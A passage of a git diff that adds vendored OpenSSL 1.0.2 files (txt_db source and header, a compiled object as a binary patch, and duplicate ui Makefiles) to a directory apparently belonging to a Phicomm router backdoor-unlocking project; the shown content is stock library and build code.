+        db->error = DB_ERROR_INDEX_OUT_OF_RANGE;
+        return (NULL);
+    }
+    lh = db->index[idx];
+    if (lh == NULL) {
+        db->error = DB_ERROR_NO_INDEX;
+        return (NULL);
+    }
+    ret = lh_OPENSSL_STRING_retrieve(lh, value);
+    db->error = DB_ERROR_OK;
+    return (ret);
+}
+
+int TXT_DB_create_index(TXT_DB *db, int field, int (*qual) (OPENSSL_STRING *),
+                        LHASH_HASH_FN_TYPE hash, LHASH_COMP_FN_TYPE cmp)
+{
+    LHASH_OF(OPENSSL_STRING) *idx;
+    OPENSSL_STRING *r;
+    int i, n;
+
+    if (field >= db->num_fields) {
+        db->error = DB_ERROR_INDEX_OUT_OF_RANGE;
+        return (0);
+    }
+    /* FIXME: we lose type checking at this point */
+    if ((idx = (LHASH_OF(OPENSSL_STRING) *)lh_new(hash, cmp)) == NULL) {
+        db->error = DB_ERROR_MALLOC;
+        return (0);
+    }
+    n = sk_OPENSSL_PSTRING_num(db->data);
+    for (i = 0; i < n; i++) {
+        r = sk_OPENSSL_PSTRING_value(db->data, i);
+        if ((qual != NULL) && (qual(r) == 0))
+            continue;
+        if ((r = lh_OPENSSL_STRING_insert(idx, r)) != NULL) {
+            db->error = DB_ERROR_INDEX_CLASH;
+            db->arg1 = sk_OPENSSL_PSTRING_find(db->data, r);
+            db->arg2 = i;
+            lh_OPENSSL_STRING_free(idx);
+            return (0);
+        }
+    }
+    if (db->index[field] != NULL)
+        lh_OPENSSL_STRING_free(db->index[field]);
+    db->index[field] = idx;
+    db->qual[field] = qual;
+    return (1);
+}
+
+long TXT_DB_write(BIO *out, TXT_DB *db)
+{
+    long i, j, n, nn, l, tot = 0;
+    char *p, **pp, *f;
+    BUF_MEM *buf = NULL;
+    long ret = -1;
+
+    if ((buf = BUF_MEM_new()) == NULL)
+        goto err;
+    n = sk_OPENSSL_PSTRING_num(db->data);
+    nn = db->num_fields;
+    for (i = 0; i < n; i++) {
+        pp = sk_OPENSSL_PSTRING_value(db->data, i);
+
+        l = 0;
+        for (j = 0; j < nn; j++) {
+            if (pp[j] != NULL)
+                l += strlen(pp[j]);
+        }
+        if (!BUF_MEM_grow_clean(buf, (int)(l * 2 + nn)))
+            goto err;
+
+        p = buf->data;
+        for (j = 0; j < nn; j++) {
+            f = pp[j];
+            if (f != NULL)
+                for (;;) {
+                    if (*f == '\0')
+                        break;
+                    if (*f == '\t')
+                        *(p++) = '\\';
+                    *(p++) = *(f++);
+                }
+            *(p++) = '\t';
+        }
+        p[-1] = '\n';
+        j = p - buf->data;
+        if (BIO_write(out, buf->data, (int)j) != j)
+            goto err;
+        tot += j;
+    }
+    ret = tot;
+ err:
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    return (ret);
+}
+
+int TXT_DB_insert(TXT_DB *db, OPENSSL_STRING *row)
+{
+    int i;
+    OPENSSL_STRING *r;
+
+    for (i = 0; i < db->num_fields; i++) {
+        if (db->index[i] != NULL) {
+            if ((db->qual[i] != NULL) && (db->qual[i] (row) == 0))
+                continue;
+            r = lh_OPENSSL_STRING_retrieve(db->index[i], row);
+            if (r != NULL) {
+                db->error = DB_ERROR_INDEX_CLASH;
+                db->arg1 = i;
+                db->arg_row = r;
+                goto err;
+            }
+        }
+    }
+    /* We have passed the index checks, now just append and insert */
+    if (!sk_OPENSSL_PSTRING_push(db->data, row)) {
+        db->error = DB_ERROR_MALLOC;
+        goto err;
+    }
+
+    for (i = 0; i < db->num_fields; i++) {
+        if (db->index[i] != NULL) {
+            if ((db->qual[i] != NULL) && (db->qual[i] (row) == 0))
+                continue;
+            (void)lh_OPENSSL_STRING_insert(db->index[i], row);
+        }
+    }
+    return (1);
+ err:
+    return (0);
+}
+
+void TXT_DB_free(TXT_DB *db)
+{
+    int i, n;
+    char **p, *max;
+
+    if (db == NULL)
+        return;
+
+    if (db->index != NULL) {
+        for (i = db->num_fields - 1; i >= 0; i--)
+            if (db->index[i] != NULL)
+                lh_OPENSSL_STRING_free(db->index[i]);
+        OPENSSL_free(db->index);
+    }
+    if (db->qual != NULL)
+        OPENSSL_free(db->qual);
+    if (db->data != NULL) {
+        for (i = sk_OPENSSL_PSTRING_num(db->data) - 1; i >= 0; i--) {
+            /*
+             * check if any 'fields' have been allocated from outside of the
+             * initial block
+             */
+            p = sk_OPENSSL_PSTRING_value(db->data, i);
+            max = p[db->num_fields]; /* last address */
+            if (max == NULL) {  /* new row */
+                for (n = 0; n < db->num_fields; n++)
+                    if (p[n] != NULL)
+                        OPENSSL_free(p[n]);
+            } else {
+                for (n = 0; n < db->num_fields; n++) {
+                    if (((p[n] < (char *)p) || (p[n] > max))
+                        && (p[n] != NULL))
+                        OPENSSL_free(p[n]);
+                }
+            }
+            OPENSSL_free(sk_OPENSSL_PSTRING_value(db->data, i));
+        }
+        sk_OPENSSL_PSTRING_free(db->data);
+    }
+    OPENSSL_free(db);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.h
new file mode 100644
index 0000000..98e23a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.h
@@ -0,0 +1,112 @@
+/* crypto/txt_db/txt_db.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_TXT_DB_H
+# define HEADER_TXT_DB_H
+
+# include <openssl/opensslconf.h>
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/stack.h>
+# include <openssl/lhash.h>
+
+# define DB_ERROR_OK                     0
+# define DB_ERROR_MALLOC                 1
+# define DB_ERROR_INDEX_CLASH            2
+# define DB_ERROR_INDEX_OUT_OF_RANGE     3
+# define DB_ERROR_NO_INDEX               4
+# define DB_ERROR_INSERT_INDEX_CLASH     5
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef OPENSSL_STRING *OPENSSL_PSTRING;
+DECLARE_SPECIAL_STACK_OF(OPENSSL_PSTRING, OPENSSL_STRING)
+
+typedef struct txt_db_st {
+    int num_fields;
+    STACK_OF(OPENSSL_PSTRING) *data;
+    LHASH_OF(OPENSSL_STRING) **index;
+    int (**qual) (OPENSSL_STRING *);
+    long error;
+    long arg1;
+    long arg2;
+    OPENSSL_STRING *arg_row;
+} TXT_DB;
+
+# ifndef OPENSSL_NO_BIO
+TXT_DB *TXT_DB_read(BIO *in, int num);
+long TXT_DB_write(BIO *out, TXT_DB *db);
+# else
+TXT_DB *TXT_DB_read(char *in, int num);
+long TXT_DB_write(char *out, TXT_DB *db);
+# endif
+int TXT_DB_create_index(TXT_DB *db, int field, int (*qual) (OPENSSL_STRING *),
+                        LHASH_HASH_FN_TYPE hash, LHASH_COMP_FN_TYPE cmp);
+void TXT_DB_free(TXT_DB *db);
+OPENSSL_STRING *TXT_DB_get_by_index(TXT_DB *db, int idx,
+                                    OPENSSL_STRING *value);
+int TXT_DB_insert(TXT_DB *db, OPENSSL_STRING *value);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/txt_db/txt_db.o
new file mode 100644
index 0000000000000000000000000000000000000000..b6ce0d98d92ae12fc79f145bde6005c15389886f
GIT binary patch
literal 6680
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
QHy{5bx4&Hen9>RP4`|B#2LJ#7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile
new file mode 100644
index 0000000..3c843dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile
@@ -0,0 +1,104 @@
+#
+# OpenSSL/crypto/ui/Makefile
+#
+
+DIR=	ui
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+#TEST= uitest.c
+TEST=
+APPS=
+
+COMPATSRC= ui_compat.c
+COMPATOBJ= ui_compat.o
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= ui_err.c ui_lib.c ui_openssl.c ui_util.c $(COMPATSRC)
+LIBOBJ= ui_err.o ui_lib.o ui_openssl.o ui_util.o $(COMPATOBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ui.h ui_compat.h
+HEADER=	$(EXHEADER) ui_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ui_compat.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ui_compat.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ui_compat.o: ../../include/openssl/stack.h ../../include/openssl/ui.h
+ui_compat.o: ../../include/openssl/ui_compat.h ui_compat.c
+ui_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ui_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ui_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ui_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ui_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ui_err.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h ui_err.c
+ui_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ui_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ui_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ui_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ui_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ui_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ui_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ui_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ui_lib.o: ../cryptlib.h ../evp/evp.h ui_dummy.c ui_lib.c ui_locl.h
+ui_util.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ui_util.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ui_util.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ui_util.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ui_util.o: ../../include/openssl/ui.h ui_locl.h ui_util.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile.bak
new file mode 100644
index 0000000..3c843dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile.bak
@@ -0,0 +1,104 @@
+#
+# OpenSSL/crypto/ui/Makefile
+#
+
+DIR=	ui
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+#TEST= uitest.c
+TEST=
+APPS=
+
+COMPATSRC= ui_compat.c
+COMPATOBJ= ui_compat.o
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= ui_err.c ui_lib.c ui_openssl.c ui_util.c $(COMPATSRC)
+LIBOBJ= ui_err.o ui_lib.o ui_openssl.o ui_util.o $(COMPATOBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ui.h ui_compat.h
+HEADER=	$(EXHEADER) ui_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ui_compat.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ui_compat.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ui_compat.o: ../../include/openssl/stack.h ../../include/openssl/ui.h
+ui_compat.o: ../../include/openssl/ui_compat.h ui_compat.c
+ui_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ui_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ui_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ui_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ui_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ui_err.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h ui_err.c
+ui_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ui_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ui_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ui_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ui_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ui_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ui_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ui_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ui_lib.o: ../cryptlib.h ../evp/evp.h ui_dummy.c ui_lib.c ui_locl.h
+ui_util.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ui_util.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ui_util.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ui_util.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ui_util.o: ../../include/openssl/ui.h ui_locl.h ui_util.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile.save
new file mode 100644
index 0000000..3c843dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/Makefile.save
@@ -0,0 +1,104 @@
+#
+# OpenSSL/crypto/ui/Makefile
+#
+
+DIR=	ui
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+#TEST= uitest.c
+TEST=
+APPS=
+
+COMPATSRC= ui_compat.c
+COMPATOBJ= ui_compat.o
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= ui_err.c ui_lib.c ui_openssl.c ui_util.c $(COMPATSRC)
+LIBOBJ= ui_err.o ui_lib.o ui_openssl.o ui_util.o $(COMPATOBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ui.h ui_compat.h
+HEADER=	$(EXHEADER) ui_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
